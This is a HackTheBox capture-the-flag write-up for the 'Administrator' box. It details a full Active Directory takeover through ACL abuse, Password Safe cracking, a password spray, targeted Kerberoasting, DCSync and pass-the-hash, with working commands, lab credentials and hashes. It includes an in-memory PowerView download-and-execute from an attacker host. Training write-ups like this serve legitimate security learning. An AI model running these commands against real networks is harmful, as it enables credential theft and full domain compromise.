HackTheBox: Administrator

Introduction

Administrator is a Windows Domain Controller that chains six distinct misconfigurations together into a full domain compromise. Credentials for a low-privileged user (Olivia) are provided as a starting point. Each step in the chain hands off cleanly to the next - this is an excellent box for understanding how real-world Active Directory attack paths are built using ACL abuse. The path to root:

Enumeration → Nmap reveals a DC with FTP, Kerberos, LDAP, SMB, and WinRM open
BloodHound → using provided creds for Olivia, map the domain and find ACL misconfigurations
GenericAll abuse → Olivia has full control over Michael → force-reset his password
ForceChangePassword → Michael can force-change Benjamin’s password → FTP access
FTP + Password Safe crack → download Backup.psafe3, crack it, get credentials for multiple users
Password spray → only Emily’s credentials are valid → WinRM shell + user flag
Targeted Kerberoasting → Emily has GenericWrite over Ethan → set a fake SPN → roast the hash → crack it
DCSync → Ethan has DCSync rights → dump Administrator hash → Pass-the-Hash → root flag

Key Concepts

What is BloodHound? BloodHound is a tool that collects Active Directory data (users, groups, permissions, ACLs) and maps it as a graph. It makes attack paths that would take hours to enumerate manually visible in seconds. bloodhound-python (also called BloodHound.py) is the Python ingestor that does the data collection from your attacker machine.

What is an ACL (Access Control List)? Every AD object (user, group, computer) has an ACL - a list of who can do what to it. Misconfigurations in these lists create the entire attack chain in this box. The dangerous rights to look for are GenericAll, GenericWrite, and ForceChangePassword.

What is GenericAll? The most powerful ACL right - it grants full control over the target object. If you have GenericAll over a user, you can reset their password, modify their attributes, add them to groups, or perform a targeted Kerberoast attack against them.

What is ForceChangePassword? An AD right that lets you reset another user’s password without knowing their current one. It bypasses the normal “confirm old password” check entirely.

What is GenericWrite? A slightly weaker right than GenericAll - it lets you modify certain attributes of the target object. The most dangerous attribute to write to is servicePrincipalName (SPN), because setting a fake SPN on an account turns it into a Kerberoastable target.

What is Kerberoasting? When an account has a Service Principal Name (SPN), the Domain Controller will hand out a service ticket encrypted with that account’s password hash to any authenticated domain user. That ticket can be captured offline and cracked. Targeted Kerberoasting means you first abuse GenericWrite to add a fake SPN to a target account, making it Kerberoastable on demand.

What is a Password Safe .psafe3 file? Password Safe is a password manager application. It stores credentials in an encrypted .psafe3 database protected by a master password. If that master password is weak, hashcat (mode 5200) can crack it with a wordlist.

What is a password spray? Instead of trying many passwords against one account (which triggers lockout), a spray tries one password across many accounts. Here we spray all the credentials recovered from the Password Safe database across domain accounts.

What is DCSync? A technique that abuses the MS-DRSR replication protocol used by Domain Controllers to sync with each other. Any account with the DS-Replication-Get-Changes-All right (typically only DCs and Domain Admins) can request a copy of any user’s password hash directly from the DC - without touching the disk or running code on the DC.

What is Pass-the-Hash? Windows NTLM authentication accepts a password hash directly instead of the plaintext password. If you have a user’s NT hash from a DCSync, you can authenticate as that user with tools like evil-winrm -H without ever knowing the password in plaintext.

Enumeration

Nmap

ports=$(nmap -p- --min-rate=1000 -T4 <TARGET> | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV <TARGET>

Key open ports:

Port	Service	Notes
21	FTP	Worth trying - Benjamin’s group has access here later
88	Kerberos	Confirms this is a Domain Controller
389 / 3268	LDAP	Domain: `administrator.htb`
445	SMB	Message signing enabled and required
5985	WinRM	Remote management - shell access if we get valid creds

Add the domain to your hosts file:

echo "<TARGET> administrator.htb" | sudo tee -a /etc/hosts

BloodHound Enumeration

We’re given starting credentials: Olivia:ichliebedich. Use bloodhound-python to collect all domain data and pipe it into BloodHound for analysis.

python3 ~/tools/BloodHound.py/bloodhound.py -d administrator.htb -c All \
  -u olivia -p 'ichliebedich' -ns <TARGET> -k

This produces JSON files locally. Start the neo4j service and upload them to BloodHound:

sudo neo4j console
# Then open http://localhost:7474 and upload the JSON files in the BloodHound GUI

Why Kerberos fallback to NTLM? The tool tries Kerberos first, but since dc.administrator.htb isn’t in our hosts file with the correct hostname, it falls back to NTLM automatically. That’s fine - the data collection still works.

In BloodHound, set OLIVIA@ADMINISTRATOR.HTB as the starting node. Go to Node Info → Outbound Object Control → First Degree Object Control. You’ll see:

Olivia ──[ GenericAll ]──► Michael

Foothold: GenericAll: Olivia → Michael

What this lets us do

GenericAll = full control. The easiest abuse is a forced password reset - we set a new password for Michael without needing to know his current one.

Connect as Olivia and reset Michael’s password

evil-winrm -i <TARGET> -u olivia -p 'ichliebedich'

*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael nirza123 /domain
The command completed successfully.

What does the /domain flag do? It ensures the password change applies to the domain account (stored on the DC) rather than a local account. Always include this when targeting AD users.

Now check Michael’s outbound control in BloodHound. Go to Node Info → Outbound Object Control → Transitive Object Control for MICHAEL@ADMINISTRATOR.HTB:

Michael ──[ ForceChangePassword ]──► Benjamin

Lateral Movement: ForceChangePassword: Michael → Benjamin → FTP

Connect as Michael

evil-winrm -i <TARGET> -u michael -p 'nirza123'

Load PowerView and reset Benjamin’s password

PowerView is a PowerShell toolkit for AD enumeration and manipulation. We load it in memory via IEX (Invoke-Expression) - this avoids writing it to disk and bypasses some AV.

# Host PowerView.ps1 on your attacker machine first (python3 -m http.server 4000)
*Evil-WinRM* PS C:\Users\michael\Documents> IEX (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>:4000/PowerView.ps1')

# Store Michael's password as a secure credential object
*Evil-WinRM* PS C:\Users\michael\Documents> $SecPassword = ConvertTo-SecureString 'nirza123' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\michael\Documents> $Cred = New-Object System.Management.Automation.PSCredential ('ADMINISTRATOR\michael', $SecPassword)

# Set the new password for Benjamin
*Evil-WinRM* PS C:\Users\michael\Documents> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\michael\Documents> Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword -Credential $Cred

Why use a PSCredential object? Set-DomainUserPassword needs to authenticate to the DC to make the change. We pass Michael’s credentials explicitly so the cmdlet uses them rather than defaulting to the session’s current token.

Access FTP as Benjamin

BloodHound shows Benjamin is a member of the Share Moderators group. Our Nmap scan showed FTP open on port 21 - this group likely has FTP access.

ftp benjamin@<TARGET>
# Password: Password123!

ftp> dir
10-05-24  09:13AM       952 Backup.psafe3

ftp> get Backup.psafe3

Cracking the Password Safe Database

What is `Backup.psafe3`?

A Password Safe encrypted database. It holds credentials for multiple users, protected by a master password. hashcat mode 5200 handles this format.

hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

Backup.psafe3:tekieromucho
Status: Cracked

Master password: tekieromucho

Open the database

Install Password Safe (sudo apt install passwordsafe) or use a Windows VM. Open Backup.psafe3 with the master password. Right-click each entry and choose Copy Password to Clipboard to retrieve the credentials:

Username	Password
alexander	`UrkIbagoxMyUGw0aPlj9B0AXSea4Sw`
emily	`UXLCI5iETUsIBoFVTj8yQFKoHjXmb`
emma	`WwANQWnmJnGV07WQN8bMS7FMAbjNur`

Password Spray → Emily → User Flag

Spray the recovered credentials across the domain

Save the usernames to user.txt and the passwords to pass.txt, then use netexec to check which combination is valid:

netexec smb <TARGET> -u user.txt -p pass.txt

SMB  <TARGET>  445  DC  [-] administrator.htb\alexander:UXLCI5iETUsIBoFVTj8yQFKoHjXmb  STATUS_LOGON_FAILURE
SMB  <TARGET>  445  DC  [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Why does netexec spray all password/user combinations? With -u and -p pointing to files, netexec tests every user against every password by default (use --no-bruteforce to only test matching pairs). Here we want the cross-product since each user may have any of the three passwords.

Only emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb is valid.

Get a shell as Emily

evil-winrm -i <TARGET> -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

✅ User flag captured. C:\Users\emily\Desktop\user.txt

Privilege Escalation: Targeted Kerberoasting: Emily → Ethan

Find Emily’s outbound control in BloodHound

In BloodHound, set EMILY@ADMINISTRATOR.HTB as your starting node. Go to Node Info → Outbound Object Control → Transitive Object Control:

Emily ──[ GenericWrite ]──► Ethan

GenericWrite over a user means we can write to their servicePrincipalName attribute. Setting a fake SPN turns the account into a Kerberoasting target - the DC will issue a service ticket encrypted with Ethan’s password hash.

Why is this “targeted”? Normal Kerberoasting only works on accounts that already have SPNs. Targeted Kerberoasting is different - we add a fake SPN to a target account first (exploiting GenericWrite), then immediately roast it. After cracking, it’s good practice to remove the fake SPN.

Fix the clock skew first

Kerberos requires the client clock to be within 5 minutes of the DC’s clock. The box’s clock is significantly ahead - sync before running the attack:

sudo ntpdate <TARGET>

CLOCK: time stepped by 25274.951714

Run targetedKerberoast

python3 targetedKerberoast.py \
  --dc-ip <TARGET> \
  -d administrator.htb \
  -u emily \
  -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' \
  -U ethan.txt

This adds a temporary SPN to Ethan’s account, requests the service ticket (which comes back encrypted with Ethan’s hash), and saves it for cracking.

Crack the hash

hashcat -a 0 -m 13100 ethan /usr/share/wordlists/rockyou.txt

Ethan’s password: limpbizkit

DCSync → Pass-the-Hash → Administrator

Check Ethan’s path in BloodHound

In BloodHound, go to Analysis → Find Shortest Paths to Domain Admins. Ethan appears with a DCSync edge to the domain. He has the DS-Replication-Get-Changes-All right, which is all secretsdump needs.

Run secretsdump as Ethan

secretsdump.py -just-dc ADMINISTRATOR.HTB/ethan@<TARGET>
# Password: limpbizkit

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
olivia:1108:...:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
michael:1109:...:41320fdff1d6c9b55c939c77a472a8a4:::
benjamin:1110:...:2b576acbe6bcfda7294d6bd18041b8fe:::
emily:1112:...:eb200a2583a88ace2983ee5caa520f31:::
ethan:1113:...:5c2b9f97e0620c3d307de85a93179884:::

What is -just-dc? This flag tells secretsdump to only dump domain controller secrets (the NTDS.DIT data) via DRSUAPI replication, rather than also trying to dump local SAM/LSA secrets. It’s quieter and faster.

Pass-the-Hash as Administrator

evil-winrm -i <TARGET> -u Administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e'

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

✅ Root flag captured. C:\Users\Administrator\Desktop\root.txt

Summary

nmap → DC at <TARGET> (FTP, Kerberos, LDAP, SMB, WinRM)
         ↓
Given credentials: Olivia:ichliebedich
         ↓
bloodhound-python → BloodHound graph
→ Olivia ──[GenericAll]──► Michael
         ↓
evil-winrm as Olivia → net user michael nirza123 /domain
         ↓
evil-winrm as Michael → PowerView → Set-DomainUserPassword benjamin → Password123!
→ Michael ──[ForceChangePassword]──► Benjamin
         ↓
ftp benjamin@<TARGET> → Backup.psafe3
         ↓
hashcat -m 5200 → master password: tekieromucho
Password Safe → alexander / emily / emma credentials
         ↓
netexec smb spray → only emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb valid
         ↓
evil-winrm as Emily → USER FLAG
         ↓
BloodHound → Emily ──[GenericWrite]──► Ethan
         ↓
sudo ntpdate (fix clock skew)
targetedKerberoast.py → Ethan's TGS hash
hashcat -m 13100 → ethan:limpbizkit
         ↓
BloodHound → Ethan ──[DCSync]──► Domain
secretsdump.py -just-dc → Administrator NT hash: 3dc553ce4b9fd20bd016e098d2d2fd2e
         ↓
evil-winrm -H → Administrator → ROOT FLAG

Tools Used

Tool	What it does	How to get it
nmap	Port scanning and service fingerprinting	`sudo apt install nmap`
bloodhound-python	Collects AD data for BloodHound graph analysis	`pip install bloodhound`
BloodHound + neo4j	Visualises AD attack paths as a graph	github.com/BloodHoundAD/BloodHound
evil-winrm	WinRM remote shell; supports Pass-the-Hash with `-H`	`gem install evil-winrm`
PowerView	PowerShell AD manipulation toolkit	github.com/PowerShellMafia/PowerSploit
hashcat	GPU-accelerated password cracker (modes: `5200` for psafe3, `13100` for TGS)	`sudo apt install hashcat`
netexec (nxc)	Swiss-army AD tool - SMB spray, WinRM, MSSQL	`pip install netexec`
targetedKerberoast.py	Abuses GenericWrite to add fake SPNs and roast target accounts	github.com/ShutdownRepo/targetedKerberoast
impacket-secretsdump	DCSync - dumps domain hashes via DRSUAPI replication	Part of `impacket` (`pip install impacket`)
ntpdate	Syncs system clock with a remote NTP/AD server	`sudo apt install ntpdate`
Password Safe	Opens and reads `.psafe3` credential databases	`sudo apt install passwordsafe`